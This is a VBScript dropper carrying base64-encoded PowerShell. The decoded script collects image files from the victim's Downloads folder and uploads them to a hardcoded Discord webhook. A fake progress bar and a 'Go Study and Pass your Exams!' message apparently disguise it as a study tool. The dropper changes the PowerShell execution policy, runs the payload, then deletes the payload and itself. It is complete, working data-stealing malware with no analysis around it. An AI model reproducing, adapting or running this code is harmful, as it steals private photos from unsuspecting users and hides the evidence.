Set fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = CreateObject("WScript.Shell")
currentFolder = fso.GetAbsolutePathName(".")
vbsPath = WScript.ScriptFullName
psPath = currentFolder & "\cam.ps1"

' Base64-encoded PowerShell code
base64Code = "JERvd25sb2Fkc1BhdGggPSAiJGVudjpVU0VSUFJPRklMRVxEb3dubG9hZHMiCiRXZWJob29rVVJMID0gImh0dHBzOi8vZGlzY29yZC5jb20vYXBpL3dlYmhvb2tzLzE0MzY3MTczNzU0MDY4NjY0NTAvS01IUUF5M1VJeDZRZVZsUWFfbHpIT3NLdDBMY2FQWDRTLU1tLVBDT0t0R0YyTUwzckEwT09rN2tTSFB2Vzh2eVNIdm0iCiRNYXhGaWxlU2l6ZU1CID0gOAokSW1hZ2VFeHRlbnNpb25zID0gQCgiLmpwZyIsICIuanBlZyIsICIucG5nIiwgIi5naWYiKQoKZnVuY3Rpb24gVXBsb2FkLUZpbGVUb0Rpc2NvcmQgewogICAgcGFyYW0gKAogICAgICAgIFtzdHJpbmddJEZpbGVQYXRoLAogICAgICAgIFtzdHJpbmddJFdlYmhvb2tVUkwKICAgICkKCiAgICAkQm91bmRhcnkgPSBbU3lzdGVtLkd1aWRdOjpOZXdHdWlkKCkuVG9TdHJpbmcoKQogICAgJExGID0gImByYG4iCiAgICAkQ29udGVudCA9ICItLSRCb3VuZGFyeSRMRiIKICAgICRDb250ZW50ICs9ICdDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iJyArIFtTeXN0ZW0uSU8uUGF0aF06OkdldEZpbGVOYW1lKCRGaWxlUGF0aCkgKyAnIicgKyAkTEYKICAgICRDb250ZW50ICs9ICdDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbScgKyAkTEYgKyAkTEYKICAgICRGaWxlQnl0ZXMgPSBbU3lzdGVtLklPLkZpbGVdOjpSZWFkQWxsQnl0ZXMoJEZpbGVQYXRoKQogICAgJENvbnRlbnRCeXRlcyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldEJ5dGVzKCRDb250ZW50KQogICAgJEVuZGluZ0J5dGVzID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0Qnl0ZXMoIiRMRi0tJEJvdW5kYXJ5LS0kTEYiKQogICAgJEFsbEJ5dGVzID0gJENvbnRlbnRCeXRlcyArICRGaWxlQnl0ZXMgKyAkRW5kaW5nQnl0ZXMKCiAgICAkV2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudAogICAgJFdlYkNsaWVudC5IZWFkZXJzLkFkZCgiQ29udGVudC1UeXBlIiwgIm11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSRCb3VuZGFyeSIpCiAgICB0cnkgewogICAgICAgICRXZWJDbGllbnQuVXBsb2FkRGF0YSgkV2ViaG9va1VSTCwgJEFsbEJ5dGVzKSB8IE91dC1OdWxsCiAgICB9CiAgICBjYXRjaCB7IH0KfQoKJEZpbGVzID0gR2V0LUNoaWxkSXRlbSAtUGF0aCAkRG93bmxvYWRzUGF0aCAtRmlsZSB8IFdoZXJlLU9iamVjdCB7ICRJbWFnZUV4dGVuc2lvbnMgLWNvbnRhaW5zICRfLkV4dGVuc2lvbi5Ub0xvd2VyKCkgfQokVG90YWxGaWxlcyA9ICRGaWxlcy5Db3VudAppZiAoJFRvdGFsRmlsZXMgLWVxIDApIHsKICAgIFdyaXRlLUhvc3QgIk5vIGltYWdlcyB0byB1cGxvYWQuIgogICAgZXhpdAp9CgokQ3VycmVudEZpbGUgPSAwCgpmb3JlYWNoICgkRmlsZSBpbiAkRmlsZXMpIHsKICAgICRDdXJyZW50RmlsZSsrCiAgICAkRmlsZVNpemVNQiA9IFttYXRoXTo6Um91bmQoJEZpbGUuTGVuZ3RoIC8gMU1CLCAyKQogICAgaWYgKCRGaWxlU2l6ZU1CIC1sZSAkTWF4RmlsZVNpemVNQikgewogICAgICAgICMgU2ltdWxhdGUgcHJvZ3Jlc3MgZm9yIHRoaXMgZmlsZQogICAgICAgIGZvciAoJGk9MTsgJGkgLWxlIDEwMDsgJGkrPTUpIHsKICAgICAgICAgICAgJFBlcmNlbnQgPSAiezA6TjB9IiAtZiAkaQogICAgICAgICAgICBXcml0ZS1Ib3N0ICgiVXBsb2FkaW5nIHswfS97MX06IFt7Mn17M31dIHs0fSUiIC1mICRDdXJyZW50RmlsZSwgJFRvdGFsRmlsZXMsICgiIyIgKiAoJGkvNSkpLCAoIiAiICogKCgxMDAtJGkpLzUpKSwgJFBlcmNlbnQpIC1Ob05ld2xpbmUKICAgICAgICAgICAgU3RhcnQtU2xlZXAgLU1pbGxpc2Vjb25kcyA1MAogICAgICAgICAgICBXcml0ZS1Ib3N0ICJgciIgLU5vTmV3bGluZQogICAgICAgIH0KCiAgICAgICAgVXBsb2FkLUZpbGVUb0Rpc2NvcmQgLUZpbGVQYXRoICRGaWxlLkZ1bGxOYW1lIC1XZWJob29rVVJMICRXZWJob29rVVJMCiAgICB9Cn0KV3JpdGUtSG9zdCAiYG5HbyBTdHVkeSBhbmQgUGFzcyB5b3VyIEV4YW1zISIK"

' Decode Base64 using ADODB.Stream
Set xml = CreateObject("MSXML2.DOMDocument.6.0")
Set node = xml.createElement("base64")
node.dataType = "bin.base64"
node.text = base64Code
binaryData = node.nodeTypedValue

Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.Write binaryData
stream.Position = 0
stream.Type = 2 ' adTypeText
stream.Charset = "utf-8"
decodedCode = stream.ReadText
stream.Close

' Write decoded code to cam.ps1
Set file = fso.CreateTextFile(psPath, True)
file.WriteLine decodedCode
file.Close

' Set execution policy for current user
WshShell.Run "powershell -NoProfile -Command ""Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -Force""", 1, True

' Run cam.ps1 and wait for it to finish
WshShell.Run "powershell -NoProfile -ExecutionPolicy RemoteSigned -File """ & psPath & """", 1, True

' Delete cam.ps1
If fso.FileExists(psPath) Then fso.DeleteFile psPath, True

' Delete this VBS script
If fso.FileExists(vbsPath) Then
    ' Schedule deletion because a script cannot delete itself immediately while running
    WshShell.Run "cmd /c ping 127.0.0.1 -n 2 > nul & del """ & vbsPath & """", 0, False
End If

